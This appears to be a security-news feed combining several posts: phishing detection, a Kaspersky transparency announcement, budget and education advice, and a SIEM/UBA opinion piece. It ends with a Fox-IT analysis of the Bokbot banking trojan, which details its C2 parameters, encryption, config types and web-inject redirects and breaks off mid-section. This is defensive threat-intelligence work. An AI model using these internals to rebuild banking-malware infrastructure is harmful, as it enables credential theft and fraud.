Combining multiple results from these analytics can filter a limited number of potentially malicious domains from massive amount of incoming domains. In our experiment, we filtered more than 17 million domains to identify only about 10 malicious ones, including phishing sites masquerading as cryptocurrency exchanges, insurance sites, online banking portals and more. Most of these sites eluded the detection of traditional browser protection; in other words, they were detected ahead of the threat! It wasn’t until weeks later that many of these sites landed on traditional domain blacklists.

Ahead-of-threat detection can help security teams protect their users — and, by proxy, their enterprise data — proactively. It also has the potential to change the game for consumers, who traditionally use tools capable of identifying malicious sites only after they are accessed.

As the risk of phishing escalates and threat actors grow more and more cunning, ahead-of-threat protection can help security professionals discover how to stay one step ahead of phishing websites — literally.

The post How to Stay One Step Ahead of Phishing Websites — Literally appeared first on Security Intelligence.

Kaspersky Lab opens first Transparency Center in Zurich

Kaspersky Lab starts data processing for European users in Zurich and also launched the first Transparency Cente under the announced Transparency Initiative

From today, malicious and suspicious files shared by users of Kaspersky Lab products in Europe will start to be processed in data centers in Zurich, initiating the first part of a relocation commitment made by the company in late 2017 under its Global Transparency Initiative. The move reflects Kaspersky Lab’s determination to assure the integrity and trustworthiness of its products and is accompanied by the opening of the company’s first Transparency Center, also in Zurich.

The relocation of data processing is part of a major infrastructure move designed to increase the resilience of the company’s IT infrastructure to risks of data breaches and supply-chain attacks, and to further prove the trustworthiness of its products, services and internal processes.

Kaspersky Zurich Transparency Center

From November 13, threat-related data coming from European users will start to be processed in two datacenters. These provide world-class facilities in compliance with industry standards to ensure the highest levels of security.

The data, which users have actively chosen to share with Kaspersky Lab, includes suspicious or previously unknown malicious files and corresponding meta-data that the company’s products send to Kaspersky Security Network (KSN) for automated malware analysis.

Files comprise only part of the data processed by Kaspersky Lab technologies, yet the most important one. Protection of customers’ data, together with the safety and integrity of infrastructure is a top priority for Kaspersky Lab, and that is why the file processing relocation comes first and is expected to be fully accomplished by the end of 2019. The relocation of other types of data processed by Kaspersky Lab products, consisting of several kinds of anonymized threat and usage statistics, is planned to be conducted during later phases of the Global Transparency Initiative.

Today also marks the opening of Kaspersky Lab’s first Transparency Center in Zurich, enabling authorized partners to access reviews of the company’s code, software updates and threat detection rules, along with other activities.

Kaspersky Zurigo Center

Through the Transparency Center, Kaspersky Lab will provide governments and partners with information on its products and their security, including essential and important technical documentation, for external evaluation in a secure environment.

These two major developments will be followed by the relocation of data processing for other regions and, in phase two, the move to Zurich of software assembly.

According to independent rankings[1], Switzerland is among the world’s top locations in terms of the number of secure internet servers available, and it has an international reputation as an innovative center for data processing and high quality IT infrastructure. Being in the heart of Europe and, at the same time, a non-EU member, it has established its own data privacy regulation that is guaranteed by the state’s constitution and federal laws. In addition, there are strict regulations on processing data requests received from authorities.

Commenting on the start of data processing in Europe and the opening of the first Transparency Center, Eugene Kaspersky, CEO Kaspersky Lab said:

“Transparency is becoming the new normal for the IT industry– and for the cybersecurity industry in particular. We are proud to be on the front line of this process. As a technological company, we are focused on ensuring the best IT infrastructure for the security of our products and data, and the relocation of key parts of our infrastructure to Switzerland places them in one of the most secure locations in the world. The promises made in our Global Transparency Initiative are coming to fruition, enhancing the resilience and visibility of our products. Through the new Transparency Center, also in Switzerland, trusted partners and governments will be able to see external reviews of our products and make up their own minds. We believe that steps such as these are just the beginning – for the company and for the security industry as a whole. The need to prove trustworthiness will soon become an industry standard.”

Commenting on Kaspersky Lab’s infrastructure move to Switzerland, Liv Minder, Investment Promotion Director from Switzerland Global Enterprise, added:

“The settlement of Kaspersky’s Transparency Center in Switzerland underlines that our country has become a global center for innovation and technology with a strong cyber security cluster, offering advanced and secure digital infrastructure within a strong framework of security and privacy that attracts ever more technology leaders.”

Kaspersky Lab’s Global Transparency Initiative was announced in October 2017 and continues to make good progress. In addition to the Transparency Center opening and the IT infrastructure relocation, a number of other actions are being undertaken.

In particular, Kaspersky Lab has engaged one of the Big Four professional services firms to conduct an audit of the company’s engineering practices around the creation and distribution of threat detection rule databases, with the goal of independently confirming their accordance with the highest industry security practices.

The assessment will be done under the SSAE 18 standard (Statement of Standards for Attestation Engagements). The scope of the assessment includes regular automatic updates of antivirus records, created and distributed by Kaspersky Lab for its products operating on Windows and Unix Servers. The company is planning the assessment under SSAE 18 with the issue of the SOC 2 (The Service and Organization Controls) report for Q2 2019.

Additionally, Kaspersky Lab continues to improve the security of its products with the help of a community of security enthusiasts from all over the world. Within one year, Kaspersky Lab resolved more than 50 bugs reported by security researchers, of which several were acknowledged to be especially valuable.

Learn more about Kaspersky Lab transparency principles and the Global Transparency Initiative here: 

About the author Kaspersky Lab

Kaspersky Lab is a global cybersecurity company, which has been operating in the market for over 20 years. Kaspersky Lab’s deep threat intelligence and security expertise is constantly transforming into next generation security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky Lab technologies and we help 270,000 corporate clients protect what matters most to them. Learn more at



Pierluigi Paganini

(Security Affairs – Kaspersky Zurich Transparency Center, threat intelligence)

The post Kaspersky Lab opens first Transparency Center in Zurich appeared first on Security Affairs.

4 Tips to Make the Most of Your Security Budget

Despite frequent news headlines describing large-scale data breaches around the globe, chief information security officers (CISOs) still struggle to justify security investments to top leadership. According to Gartner, security spending makes up only about 5.6 percent of overall IT funds.

Whatever security budget is ultimately approved by enterprise leadership, it’s up to CISOs to optimize the allocation of that money. More funds might help, but only if they know how to spend it effectively — and that planning starts before the first pitch. Let’s take a closer look at four key steps security leaders can take to maximize their return on security investment.

1. Assess Risks, Assets and Resources

A CISO should first thoroughly evaluate the systems, data and other business assets that are both valuable and potentially at risk in the organization. Today, this makes up an ever-evolving network, and priorities will shift over time to reflect changes in the business and the threat landscape.

“You should first identify and document the assets you need to protect most,” said Jo-Ann Smith, director of technology risk management and data privacy at Absolute. “What’s important to your business, and what are the main threats to your systems and data?”

That evaluation needs to take place before you even set foot in the executive office or boardroom to advocate for security. Its findings will be foundational to the security program’s goals and budget recommendations. Technologies purchased and the needs they serve will be unique to each business.

In other words, the results of the initial review could mean many different things for different CISOs. The general models provided by industry frameworks can help security leaders shape priorities and identify gaps specific to their businesses.

Kip Boyle, CEO of Cyber Risk Opportunities, noted that the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) is the best method to assess cyber risk.

“We find that most companies are underinvested in such key mitigations as indemnity contractual provisions with suppliers and customers, antiphishing training, cyber insurance coverage and crisis management planning,” he said. “Yet these are all crucial to mitigating modern cyberthreats.”

2. Align the Security Budget With Business Goals

When demonstrating the return on security investment to executives and board directors, security leaders must speak the language of money. How does security serve the business?

“CISOs should always align with the business when evaluating how to spend,” said Larry Friedman, CISO at Carbonite. “Security spend should be calculated based on the risk associated with assuring continuity with important business processes.”

This goes beyond protecting data and maintaining regulatory compliance. Seeking opportunities to use security funding not just for risk mitigation, but also to boost revenue and accomplish other business wins such as enhanced productivity, helps the CISO position security as a dynamic business enabler rather than a static cost center.

The CISO should implement automated security intelligence and analytics tools to reduce the security team’s busywork and help it focus on more strategic projects. As you analyze opportunities for investment, consider not only how much they cost, but also how much they could save the company or add in value.

3. Hire and Train Good People

The oft-lamented cybersecurity skills gap shows few signs of closing. A recent report from the International Information System Security Certification Consortium (ISC2) placed the worldwide cybersecurity skills gap at almost 3 million unfilled positions, and about two-thirds of businesses believe they have inadequately staffed security teams.

It stands to reason that one of the best investments in a security program is an effective staff. However, in a tight market for employers seeking talent, organizations may have to look inward and invest in training employees who otherwise might not have considered a security career.

By training people that are already part of the organization and recruiting them to work in security, CISOs can offer opportunities for professional growth and build their security teams while taking advantage of the employees’ institutional knowledge.

4. Invest in Security Culture

An effective cybersecurity strategy must include a corporate culture in which every employee values security. But the “2018 Cybersecurity Culture Report” from the Information Systems Audit and Control Association (ISACA) and Capability Maturity Model Integration (CMMI) Institute found that most organizations still struggle with establishing a security culture. In addition, 95 percent of survey respondents noted a gap between their current and desired organizational culture of cybersecurity.

What does it mean to build security culture into business? It’s means getting all employees — from the security team to the executive suite — to feel invested in the company’s security and risk posture and to engage in secure behavior. Investments in security culture could include initiatives such as awareness training, a secure development life cycle program, and rewards for employees who demonstrate compliance and report incidents.

Some numbers bear out the benefit: According to the ISACA/CMMI study, organizations that reported an inadequate security culture are spending 19 percent of their annual cybersecurity budget on training and awareness. Firms that report stronger cultures spent a share more than twice as large on average (43 percent).

In an ISACA blog post about the study results, Heather Wilde, chief technology officer (CTO) at ROCeteer, noted that the benefits of security culture investment go beyond security. A majority of respondents (66 percent) said their organization experienced a reduction in cyber incidents, but Wilde noted that many other benefits were customer-facing: improved trust, stronger reputation and increased revenue, to name a few.

There is no simple answer to the question of how best to allocate security budget dollars, and the optimal course will vary widely from business to business. But a thorough assessment of a company’s current security posture and culture, along with an evaluation of how security can benefit business goals and enable the company mission, gives the CISO a road map for prioritizing investments.

The post 4 Tips to Make the Most of Your Security Budget appeared first on Security Intelligence.

How Can Industry Leaders and Academia Help Improve Cybersecurity Education?

Just as the field of cybersecurity grew out of information technology, cybersecurity education is evolving as an offshoot of the computer science field. The current state of cybersecurity course offerings as an underdeveloped computer science footnote is allowing the skills gap to grow. To change this, higher education has to address the theoretical and hands-on skills students need to do their jobs post-graduation.

Without sufficient expert staffing, security teams lack the resources necessary to do their jobs effectively; in this way, the skills gap itself is a significant security risk. How, then, can the industry educate the next generation at scale? While there is no one answer, let’s take a look at what’s going on in classrooms across colleges and universities to see how higher education can evolve to meet the needs of the industry.

How to Recognize Shortcomings in Cybersecurity Education

By taking a closer look at the actual cybersecurity training programs higher education currently provides, industry leaders can help draw the road map of where it needs to go. How can they improve its offerings without bankrupting students who are already spending tens of thousands of dollars on degrees that fail to prepare them for the real-world problems they will face?

Bo Yuan, professor and chair of the Department of Computing Security at Rochester Institute of Technology (RIT), acknowledged that many undergraduate degree programs in cybersecurity start out with common introductory courses in computing and mathematics, such as Computer Science I and II and Calculus, eventually ramping up to more specialized training.

“As they get further into the program, students at RIT take more cybersecurity-focused courses, including Introduction to Cryptography and Cyber Security Policy and Law,” Yuan said. “In master’s degree programs, courses often focus on the theoretical foundations of computing security and how to become leaders in the implementation of computing security and information assurance policies and practices.”

To ensure that graduates are able to successfully transition from the classroom to the security operations center (SOC), cybersecurity education leaders should expand and more deeply integrate their hands-on learning opportunities.

Why Student Outreach Is Crucial

With the hefty price tag on degrees these days, students need to be judicious in the programs they choose. But it’s also up to industry leaders to reach out to their future recruits and help connect them with opportunities. Although one-to-one engagement across school districts is impossible, any role security professionals can play is a significant investment in long-term cybersecurity strategy.

Steering students cybersecurity training programs that offer them the chance to detect, identify and respond to existing threats in a simulated environment will yield the best returns. Unfortunately, those opportunities are not equally available to all students, and many won’t have the exposure they need to recognize their specialized interests within computer science early enough to plan effectively to get there.

Collaborate to Offer Experiential Learning

Hands-on learning opportunities are essential for cybersecurity students, and many academic institutions, including RIT, enable students to gain experience through simulated real-world exercises. But the students need to know what’s out there before making career-defining decisions to specialize one way over another.

To that end, some security companies have already parterned with educational organizations to extend opportunities for such immersive training.

“We have a heavy hands-on component to the degree programs with labs and project assignments,” Yuan explained. “Additionally, RIT computing security students are required to do two terms of co-ops (paid internships) before graduation.”

Yuan noted that RIT students have engaged in cooperative educational experiences with organizations such as IBM, Eaton Corporation and government agencies. These experiences often lead to job offers before graduation; both students and recruiters are reaping the benefits of these arrangements.

Why It’s Important to Make Connections Early

Through internships and co-ops, students can develop strong cybersecurity skills in the field, which hiring organizations desperately need to keep up with the evolving threat landscape. The Advanced Cyber Security Center (ACSC) and the University of Massachusetts created the Cybersecurity Education and Training Consortium (CETC) to bring industry leaders and students together. According to a press release, “The CETC will connect higher education leaders with business leaders to promote academic programming in cybersecurity that aligns with the needs of Massachusetts employers.”

Higher education programs around the world should partner with the cybersecurity industry to learn more about the needs of students and professionals. Through these innovations, students and enterprises can gain efficient access to both learning opportunities and talent. By working together with institutions of higher learning, businesses can ensure that students come out of learning programs armed with an understanding of the existing threat landscape and how to monitor its constant change so that they are fully equipped to do their jobs.

The post How Can Industry Leaders and Academia Help Improve Cybersecurity Education? appeared first on Security Intelligence.

Why User Behavior Analytics Is an Application, Not a Cybersecurity Platform

Last year, a cybersecurity manager at a bank near me brought in a user behavior analytics (UBA) solution based on a vendor’s pitch that UBA was the next generation of security analytics. The company had been using a security information and event management (SIEM) tool to monitor its systems and networks, but abandoned it in favor of UBA, which promised a simpler approach powered by artificial intelligence (AI).

One year later, that security manager was looking for a job. Sure, the UBA package did a good job of telling him what his users were doing on the network, but it didn’t do a very good job of telling him about threats that didn’t involve abnormal behavior. I can only speculate about what triggered his departure, but my guess is it wasn’t pretty.

UBA hit the peak of the Gartner hype cycle last year around the same time as AI. The timing isn’t surprising given that many UBA vendors tout their use of machine learning to detect anomalies in log data. UBA is a good application of SIEM, but it isn’t a replacement for it. In fact, UBA is more accurately described as a cybersecurity application that rides on top of SIEM — but you wouldn’t know that the way it’s sometimes marketed.

User Behavior Analytics Versus Security Information and Event Management

While SIEM and UBA do have some similar features, they perform very different functions. Most SIEM offerings are essentially log management tools that help security operators make sense of a deluge of information. They are a necessary foundation for targeted analysis.

UBA is a set of algorithms that analyze log activity to spot abnormal behavior, such as repeated login attempts from a single IP address or large file downloads. Buried in gigabytes of data, these patterns are easy for humans to miss. UBA can help security teams combat insider threats, brute-force attacks, account takeovers and data loss.

UBA applications require data from an SIEM tool and may include basic log management features, but they aren’t a replacement for a general-purpose SIEM solution. In fact, if your SIEM system has anomaly detection capabilities or can identify whether user access activity matches typical behavior based on the user’s role, you may already have UBA.

Part of the confusion comes from the fact that, although SIEM has been around for a long time, there is no one set of standard features. Many systems are only capable of rule-based alerting or limited to canned rules. If you don’t have a rule for a new threat, you won’t be alerted to it.

Analytical applications such as UBA are intended to address certain types of cybersecurity threat detection and remediation. Choosing point applications without a unified log manager creates silos of data and taxes your security operations center (SOC), which is probably short-staffed to begin with. Many UBA solutions also require the use of software agents, which is something every IT organization would like to avoid.

Start With a Well-Rounded SIEM Solution

A robust, well-rounded SIEM solution should cross-correlate log data, threat intelligence feeds, geolocation coordinates, vulnerability scan data, and both internal and external user activity. When combined with rule-based alerts, an SIEM tool alone is sufficient for many organizations. Applications such as UBA can be added on top for more robust reporting.

Gartner’s latest “Market Guide for User and Entity Behavior Analytics” forecast significant disruption in the market. Noting that the technology is headed downward into Gartner’s “Trough of Disillusionment,” researchers explained that some pure-play UBA vendors “are now focusing their route to market strategy on embedding their core technology in other vendors’ more traditional security solutions.”

In my view, that’s where it belongs. User behavior analytics is a great technology for identifying insider threats, but that’s a use case, not a security platform. A robust SIEM tool gives you a great foundation for protection and options to grow as your needs demand.

The post Why User Behavior Analytics Is an Application, Not a Cybersecurity Platform appeared first on Security Intelligence.

A Day In The Life Of A Purple Teamer

Considering the ruthless tactics attackers will use to gain access to an organization’s assets, security professionals are now seeking to have both red and blue teaming skills. We asked Dimitrios Bougioukas, our training director, a few questions about the challenges and opportunities that come with being a purple teamer.

What are your main responsibilities as a Training Director & Purple Teamer?

My main responsibilities include directing eLearnSecurity’s course development activities, leading the IT security research endeavors of the company and constantly monitoring the threat landscape as well as the latest technology advancements in order to create new courses that cover new and emerging IT security segments.

What part of this job do you personally find most satisfying? Most challenging?
As a Training Director, my upper goal is to create the next generation of complete and up-to-date IT security professionals. We take our students’/clients’ education seriously and we strive towards providing the most practical and up-to-date IT security courses in the market. As you can imagine, when I see students passing our challenging exams and applying the knowledge they obtained to effectively secure their organization, it is the most fulfilling and satisfying feeling in the world. On the other hand, the most challenging part of my job is conducting IT security research, discovering new attack vectors, security bypasses etc. To do so, understanding the underpinnings and full capabilities of each technology is required and this is just the beginning. Countless attempts of trying to subvert each technology’s normal flow by supplying all kinds of imaginative input is also required and this is equally demanding.
What are the most important skills for Purple Teamers?
To become a purple teamer, you will have to be equally skilled at (web app, infrastructure, mobile, cloud) penetration testing and at incident response/threat hunting. Reverse engineering and/or information security management skills are also nice to have. Especially the information security management skills are of great importance, since on enterprise environments technical skills and skilled personnel is nothing without properly implemented IT security processes, planning, and management.
What jobs can you get with purple teaming skills?
To be honest, when you have mastered both Red and Blue team skills, the job possibilities are endless. And I don’t just mean that you can fill a penetration testing or an incident response/threat hunting position with ease. I mean that you will be in the position to even fill an IT security management position with minimum effort (of course some information security management and/or risk management skills will be required to do so).
What advice would you give to someone aspiring to become a successful purple teamer?

I am sure that you have figured by now, that becoming a Purple Teamer is a demanding endeavor. I would recommend being methodical, patient and passionate while developing your skillset. The danger of  “educational fatigue” is high during this journey, so, take it easy and enjoy every destination.


Find out how to develop proficiency in both advanced penetration testing and threat intelligence with our Purple Team Member training path:


Connect with us on Social Media

LinkedIn | Facebook | Twitter  | Instagram

Busting Cybersecurity Silos

Cybersecurity is among the most siloed disciplines in all of IT. The industry is exceedingly fragmented between many highly specialized companies. In fact, according to IBM estimates, the average enterprise uses 80 different products from 40 vendors. To put this in perspective, imagine a law enforcement officer trying to piece together the events surrounding a crime based solely on witness statements written in multiple languages — one in Chinese, another in Arabic, a third in Italian, etc. Security operations centers (SOCs) face a similar challenge all the time.

Security professionals are increasingly taking on the role of investigator, sorting through multiple data sources to track down slippery foes. Third-party integration tools don’t exist, so the customer is responsible for bringing together data from multiple sources and applying insights across an increasingly complex environment.

For example, a security team may need to coordinate access records with Lightweight Directory Access Protocol (LDAP) profiles, database access logs and network activity monitoring data to determine whether a suspicious behavior is legitimate or the work of an impostor. Security information may even need to be brought in from external sources such as social networks to validate an identity. The process is equivalent to performing a massive database join, but with incompatible data spread across a global network.

What Can We Learn About Collaboration From Threat Actors?

Organizations would be wise to observe the strategy of today’s threat actors, who freely share tactics, tools and vulnerabilities on the dark web, accelerating both the speed and impact of their attacks. As defenders of cybersecurity, we need to take a similar approach to sharing security information and building collaborative solutions that will address the evolving cybersecurity threat landscape.

This is easier said than done, as the cybersecurity industry has not been successful in enabling information to be shared, federated and contextualized in a way that drives effective security outcomes. But the barriers aren’t solely technical; corporate policies, customer privacy concerns and regulations all combine to inhibit information sharing. We must enable collaboration in ways that don’t undermine the interests of the collaborators.

Security information sharing is not only useful for threat management, but also for accurately determining IT risk, enabling secure business transformation, accelerating innovation, helping with continuous compliance and minimizing friction for end users. For example, organizations can leverage the identity context of an individual from multiple sources to evaluate the person’s reputation and minimize fraud for both new account creation and continuous transaction validation. This type of risk-based approach allows organizations to quickly support new initiatives, such as open banking application programming interfaces (APIs), and regulations, such as the European Union’s revised Payment Service Directive (PSD2).

The Keys to Building a Community Across Cybersecurity Silos

Sharing security data and insights and developing an ecosystem across cybersecurity silos is a transformational concept for the industry — one that requires people, process and technology adaptations. As organizations embrace secure digital transformations, security professionals need to adopt a risk-based approach to security management built on insights from several sources that include both technical and business contexts.

As security becomes more distributed within an organization, processes need to evolve to support integrated and collaborative operations. Sharing of data and insights will enable multiple business units to coordinate and deliver unified security. Technology needs to be API-driven and delivered as a service so it can integrate with others to facilitate sharing. Security solutions also need to evolve to deliver outcome-based security though capabilities that take advantage of data and insights from multiple vendors, platforms and locations.

The security industry is taking steps to address the complexity problem with standards designed to efficiently share data and insights. Standards such as STIX/TAXII, OpenC2 and CACAO are rapidly maturing and gaining adoption for their ability to enable vendors and their customers to choose what data to share. More than 50 cybersecurity vendors have adopted or plan to adopt STIX as a standard for data interchange, according to OASIS.

However, more work needs to be done. Standards and practices need to evolve to enable information sharing within and between industries, as well as ways to exchange methodologies, indicators of compromise (IoCs), response strategies and the like.

Finally, we need a cloud-based community platform that supports open standards-based collaboration for the delivery of integrated cybersecurity solutions. A platform-based approach will bring together people, process, tools, data and insights without expensive customization and integration projects. By increasing the adoption of such a platform, we can create a cybersecurity ecosystem that can address complexity, combat the evolving threat landscape and reduce the need for specialized security skills.

Bringing the Industry Together With IBM Security Connect

IBM has been on a journey to reduce complexity through a security immune system approach, enabling open collaboration through initiatives such as X-Force Exchange and Quad9, and driving open industry standards such as STIX/TAXII. We are furthering our commitment to strengthening cybersecurity with the recent announcement of IBM Security Connect, an open cloud platform for developing solutions based on distributed capabilities and federated data and insights.

Security Connect provides an open data integration service for sharing and normalizing threat intelligence, federated data searching across on-premises and cloud data repositories, and real-time sharing of security alerts, events and insights that can be leveraged by any integrated application or solution. This will pave the way for new methods of delivering innovative outcome-based security solutions powered by artificial intelligence (AI).

Clients and partners can take advantage of this open, cloud-native platform by combining their own data and insights with capabilities from IBM and other vendor technologies. We have already partnered with 15 major security software providers and look forward to adding more.

We are very excited about bringing this concept of data and insights collaboration to life, and grateful for the opportunity to bring cybersecurity silos together to reduce complexity and keep up with the evolving cybersecurity landscape. Early feedback has been gratifying, and we’d love to hear your comments and suggestions. I hope you will join us in this endeavor by learning more about IBM Security Connect and participating in the early field trial.

The post Busting Cybersecurity Silos appeared first on Security Intelligence.

Hash Hunting: Why File Hashes are Still Important

According to Gartner, threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable intelligence. When security research teams or government agencies release threat intelligence reports, some of the more tactical actionable intelligence is in the indicators. These indicators include (but are not limited to) IP addresses, domain names, file names or file hashes. […]… Read More

The post Hash Hunting: Why File Hashes are Still Important appeared first on The State of Security.

Bokbot: The (re)birth of a banker

This blogpost is a follow-up to a presentation with the same name, given at SecurityFest in Sweden by Alfred Klason.


Bokbot (aka: IcedID) came to Fox-IT’s attention around the end of May 2017 when we identified an unknown sample in our lab that appeared to be a banker. This sample was also provided by a customer at a later stage.

Having looked into the bot and the operation, the analysis quickly revealed that it’s connected to a well-known actor group that was behind an operation publically known as 76service and later Neverquest/Vawtrak, dating back to 2006.

Neverquest operated for a number of years before an arrest lead to its downfall in January 2017. Just a few months afterwards we discovered a new bot, with a completely new code base but based on ideas and strategies from the days of Neverquest. Their business ties remains intact as they still utilize services from the same groups as seen before but also expanded to use new services.

This suggests that at least parts of the group behind Neverquest is still operating using Bokbot. It’s however unclear how many of the people from the core group that have continued on with Bokbot.

Bokbot is still a relatively new bot, just recently reaching a production state where they have streamlined and tested their creation. Even though it’s a new bot, they still have strong connections within the cybercrime underworld which enables them to maintain and grow their operation such as distributing their bot to a larger number of victims.

By looking back in history and the people who are behind this, it is highly likely that this is a threat that is not going away anytime soon. Fox-IT rather expects an expansion of both the botnet size and their target list.

76service and Neverquest

76service was, what one could call, a big-data mining service for fraud, powered by CRM (aka: Gozi). It was able to gather huge amounts of data from its victims using, for example, formgrabbing where authorization and log-in credentials are retrieved from forms submitted to websites by the infected victim.

76service panel login page (source:

76service login page (source:

The service was initially spotted in 2006 and was put into production in 2007, where the authors started to rent out access to their platform. When given access to the platform, the fraudulent customers of this service could free-text search in the stolen data for credentials that provide access to online services, such as internet banking, email accounts and other online platforms.

76service operated uninterrupted until November 2010, when an Ukrainian national named Nikita Kuzmin got arrested in connection with the operation. This marked the end of the 76service service.

Nice Catch! – The real name of Neverquest

A few months before the arrest of Nikita he shared the source code of CRM within a private group of people which would enable them to continue the development of the malware. This, over time, lead to the appearance of multiple Gozi strains, but there was one which stood out more than the others, namely: Catch.

Catch was the name given internally by the malware authors, but to the security community and the public it was known as Vawtrak or Neverquest.

During this investigation into Catch it became clear that 76service and Catch shared several characteristics. They both, for example, separated their botnets into projects within the panel they used for administering their infrastructure and botnets. Instead of having one huge botnet, they assigned every bot build with a project ID that would be used by the bot to let the Command & Control (C2) server know which specific project the bot belonged to.

76service and Catch also shared the same business model, where they shifted back and forth between a private and rented model.

The private business model meant that they made use of their own botnet, for their own gain, and the rented business model meant that they rented out access to their botnet to customers. This provided them with an additional income stream, instead of only performing the fraud themselves.

The shift between business models could usually be correlated with either: backend servers being seized or people with business ties to the group being arrested. These types of events might have spooked the group as they limited their infrastructure, closing down access for customers.

For the sake of simplicity, Catch will from here on be referred to as Neverquest in this post.

“Quest means business” – Affiliations

If one would identify a Neverquest infection it might not be the only malware that is lurking on the infected system. Neverquest has been known to cooperate with other crimeware groups, either to distribute additional malware or use existing botnets to distribute Neverquest.

During the investigation and tracking of Neverquest Fox-IT identified the following ties:

Crimeware/malware group Usage/functionality
Dyre Download and execute Dyre on Neverquest infections
TinyLoader & AbaddonPOS Download and execute TinyLoader on Neverquest infections. TinyLoader was later seen downloading AbaddonPOS (as mentioned by Proofpoint)
Chanitor/Hancitor Neverquest leverages Chanitor to infect new victims.

By leveraging these business connections, especially the connection with Dyre, Neverquest is able to maximize the monetization of the bots. This since Neverquest could see if a bot was of interest to the group and if not, it could be handed off to Dyre which could cast a wider net, targeting for example a bigger or different geographical region and utilize a bot in a different way.

More on these affiliations in a later section.

The never ending quest comes to an end

Neverquest remained at large from around 2010, causing huge amounts of financial losses, ranging from ticket fraud to wire fraud to credit card fraud. Nevertheless, in January 2017 the quest came to an end, as an individual named Stanislav Lisov was arrested in Spain. This individual was proven to be a key player in the operation: soon after the arrest the backend servers of Neverquest went offline, never to come back online, marking the end of a 6 year long fraud operation.

A more detailed background on 76service and Neverquest can be found in a blogpost by PhishLabs.

A wild Bokbot appears!

Early samples of Bokbot were identified in our lab in May 2017 and also provided to us by a customer. At this time the malware was being distributed to US infections by the Geodo (aka: Emotet) spam botnet. The name Bokbot is based on a researcher who worked on the very early versions of the malware (you know who you are 😉 ).

Initial thoughts were that this was a new banking module for Geodo, as this group had not been involved in banking/fraud since May 2015. This scenario was quickly dismissed after having discovered evidence that linked Bokbot to Neverquest, which will be further outlined hereafter.

Bokbot internals

First, let’s do some housekeeping and look into some of the technical aspects of Bokbot.


All communication between a victim and the C2 server is sent over HTTPS using POST- and GET-requests. The initial request sent to the C2 is a POST-request containing some basic information about the machine it’s running on, as seen in the example below. Any additional requests like requesting configs or modules are sent using GET-requests, except for the uploading of any stolen data such as files, HTML code, screenshots or credentials which the victim submits using POST-requests.

Even though the above request is from a very early version (14) of the bot, the principle still applies to the current version (101), first seen 2018-07-17.

URL param. Comment
b Bot identifier, contains the information needed to identify the individual bot and where it belongs. More information on this in later a section.
d Type of uploaded information. For example screenshot, grabbed form, HTML or a file
e Bot build version
i System uptime
POST-data param. Comment
k Computer name (Unicode, URL-encoded)
l Member of domain… (Unicode, URL-encoded)
j Bot requires signature verification for C2 domains and self-updates
n Bot running with privilege level…
m Windows build information (version, arch., build, etc.)

The parameters that are not included in the table above are used to report stolen data to the C2.

The C2 response of this particular bot version is a simple set of integers which tells the bot which command(s) that should be executed. This is the only C2 response that is unencrypted, all other responses are encrypted using RC4. Some responses are, like the configs, also compressed using LZMAT.

After a response is decrypted, the bot will check if the first 4 bytes equal “zeus”.


If the first 4 bytes are equal to “zeus”, it will decompress the rest of the data.

The reason for choosing “zeus” as the signature remains unknown, it could be an intentional false flag, in an attempt to trick analysts into thinking that this might be a new ZeuS strain. Similar elusive techniques have been used before to trick analysts. A simpler explanation could be that the developer simply had an ironic sense of humor, and chose the first malware name that came to mind as the 4 byte signature.


Bokbot supports three different types of configs, which all are in a binary format rather than some structured format like XML, which is, for example, used by TheTrick.

Config Comment
Bot The latest C2 domains
Injects Contains targets which are subject to web injects and redirection attacks
Reporting Contains targets related to HTML grabbing and screenshots

The first config, which includes the bot C2 domains, is signed. This to prevent that a takeover of any of the C2 domains would result in a sinkholing of the bots. The updates of the bot itself are also signed.

The other two configs are used to control how the bot will interact with the targeted entities, such as redirecting and modifying web traffic related to for example internet banking and/or email providers, for the purpose of harvesting credentials and account information.

The reporting config is used for a more generic purpose, where it’s not only used for screenshots but also for HTML grabbing, which would grab a complete HTML page if a victim browses to an “interesting” website, or if the page contains a specific keyword. This enables the actors to conduct some reconnaissance for future attacks, like being able to write web injects for a previously unknown target.

Geographical foothold

Ever since the appearance Bokbot has been heavily focused on targeting financial institutions in the US even though they’re still gathering any data that they deem interesting such as credentials for online services.

Based on Fox-IT’s observation of the malware spread and the accompanied configs we find that North America seems to be Bokbot’s primary hunting ground while high infection counts have been seen in the following countries:

  • United States
  • Canada
  • India
  • Germany
  • Netherlands
  • France
  • United Kingdom
  • Italy
  • Japan

“I can name fingers and point names!” – Connecting the two groups

The two bots, on a binary level, do not show much similarity other than the fact that they’re both communicating over HTTPS and use RC4 in combination with LZMAT compression. But this wouldn’t be much of an attribution as it’s also a combination used in for example ZeuS Gameover, Citadel and Corebot v1.

The below tables provides a short summary of the similarities between the groups.

Connection Comment
Bot and project ID format The usage of projects and the bot ID generation are unique to these groups along with the format that this information is communicated to the C2.
Inject config The injects and redirection entries are very similar and the format haven’t been seen in any other malware family.
Reporting config The targeted URLs and “interesting” keywords are almost identical between the two.
Affiliations The two group share business affiliations with other crimeware groups.

Bot ID, URL pattern and project IDs

When both Neverquest and Bokbot communicate with their C2 servers, they have to identify themselves by sending their unique bot ID along with a project ID.

An example of the string that the server uses in order to identify a specific bot from its C2 communication is shown below:


The placement of this string is of course different between the families, where Neverquest (in the latest version) placed it, encoded, in the Cookie header field. Older version of Neverquest sent this information in the URL. Bokbot on the other hand sends it in the URL as shown in a previous section.

One important difference is that Neverquest used a simple number for their project ID, 7, in the example above. Bokbot on the other hand is using a different, unknown format for its project ID. A theory is that this could be the CRC checksum of the project name to prevent any leakage of the number of projects or their names, but this is pure speculation.

Another difference is that Bokbot has implemented an 8 bit checksum that is calculated using the project ID and the bot ID. This checksum is then validated on the server side and if it doesn’t match, no commands will be returned.

To this date there has been a total of 20 projects over 25 build versions observed, numbers that keeps on growing.

Inject config – Dynamic redirect structure

The inject config not only contain web injects but also redirects. Bokbot supports both static redirects which redirects a static URL but also dynamic redirects which redirects a request based on a target matched using a regular expression.

The above example is a redirect attack from a Neverquest config. They use a regular expression to match on the requested URL. If it should match they will extract the name of the requested file along with its extension. The two strings are then used to construct a redirect URL controlled by the actors. Thereby, the $1 will be replaced with the file name and $2 will be replaced with the file extension.


How does this compare with Bokbot?


